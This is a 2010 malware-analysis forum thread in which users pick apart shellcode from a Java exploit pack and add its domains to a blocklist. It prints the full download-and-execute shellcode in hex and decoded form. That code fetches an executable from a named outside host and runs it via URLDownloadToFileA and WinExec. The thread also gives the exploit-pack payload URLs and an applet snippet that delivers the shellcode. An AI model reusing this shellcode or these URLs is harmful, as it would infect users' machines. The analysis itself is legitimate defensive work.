Malware Domain List

Malware Related => Malware Analysis => Topic started by: Garlando on February 13, 2010, 06:15:06 am

Title: Shellcode analysis?
Post by: Garlando on February 13, 2010, 06:15:06 am
hi
i was investigating a java exploit, and decided to take a look at the shellcode

Code: [Select]
505351525657559CE8000000005D83ED0D31C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C5657BE5E01000001EEBF4E01000001EFE8D60100005F5E89EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356302000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C278020000526A00FFD06A0589EA81C25E01000052FF955A01000089EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356E02000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C2A6020000526A00FFD06A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C30000000000000000000000000000000047657454656D705061746841004C6F61644C696272617279410047657450726F63416464726573730057696E4578656300BB89F289F730C0AE75FD29F789F931C0BE3C00000003B51B02000066AD03851B0200008B707883C61C03B51B0200008DBD1F020000AD03851B020000ABAD03851B02000050ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF3A65974045E43EBE95E93D1E003852702000031F69666ADC1E00203851F02000089C6AD03851B020000C3EB100000000000000000000000000000000089851B0200005657E858FFFFFF5F5EAB01CE803EBB7402EBEDC355524C4D4F4E2E444C4C0055524C446F776E6C6F6164546F46696C6541007064667570642E6578650063726173682E70687000687474703A2F2F3139322E616E74697672323030392E636E2F73656E632E657865009026
Code: [Select]
PSQRVWU�����]�
1d@0x �@ �p�@ �@4�@|�@<VW^��N����_^��^��Rh�����N����^��1��5c����t�2F2���E��R�R����P��RP�V��j�j���^��R��x��Rj�j��^��R�Z����^��Rh�����N����^��1��5n����t�2F2���E��R�R����P��RP�V��j�j���^��R��¦��Rj�j��^��R�Z���]_^ZY[X����������������GetTempPathA�LoadLibraryA�GetProcAddress�WinExec���0u)�1<�����f����px������������P���^1ۭV�����QYt^C^��'��1�f����ƭ�����������������������VWX_^�>tURLMON.DLL�URLDownloadToFileA�pdfupd.exe�crash.php�http://192.antivr2009.cn/senc.exe��&
it uses URLDownloadToFileA to download the malware as pdfupd.exe from hxxp://192.antivr2009.cn/senc.exe
but what left me wondering is the string 'crash.php' can anyone explain to me the purpose of this string, i'm not very talented in analysing malware so if anyone can clarify this to me i'd be very happy

thanks Garland
Title: Re: Shellcode analysis?
Post by: MysteryFCM on February 14, 2010, 09:37:00 pm
What's the URL that houses this?
Title: Re: Shellcode analysis?
Post by: Garlando on February 15, 2010, 12:17:11 pm
What's the URL that houses this?

it's down now, but this site offers the same exploit pack

Code: [Select]
miamiheraldsi.com/in0/index.php
its in the params of the java exploit
Title: Re: Shellcode analysis?
Post by: MysteryFCM on February 15, 2010, 01:24:44 pm
Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are;

Code: [Select]
http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param, still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).
Title: Re: Shellcode analysis?
Post by: SysAdMini on February 15, 2010, 01:29:07 pm
Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are;

Code: [Select]
http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param, still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).

Added this morning.

http://www.malwaredomainlist.com/mdl.php?search=miamiheraldsi.com&colsearch=All&quantity=50
Title: Re: Shellcode analysis?
Post by: Garlando on February 15, 2010, 01:39:29 pm
Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are;

Code: [Select]
http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param, still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).

sorry i mean the param tags in the decoded javascript

<applet src=gsb50.jar ....something other....>
<param name='sc' value='the shellcode'>
</applet>
Title: Re: Shellcode analysis?
Post by: MysteryFCM on February 15, 2010, 01:43:02 pm
hehe cool :) (related to learn-to-knit.com (site that led me to it)). I've just added the payload URL's to MDL :) (just got back home so finally able to analyze it)

@Garlando,
There's actually two. The first (and commented out for some reason (likely because of the second one), points to l.php?i=10, the second points to i=9. Again however, I can't find any reference or active URL for pdfupd.exe (not ran it on the test machine yet, but guessing pdfupd.exe is the filename it's downloaded as) nor crash.php.